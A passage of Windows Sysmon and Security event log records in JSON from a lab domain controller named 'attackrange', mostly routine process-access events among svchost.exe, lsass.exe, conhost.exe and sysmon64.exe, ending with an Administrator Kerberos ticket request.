0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-00107FAD1100}\r\nSourceProcessId: 3592\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-001099CA1100}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-00107FAD1100}","SourceProcessId":"3592","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-001099CA1100}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220742,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
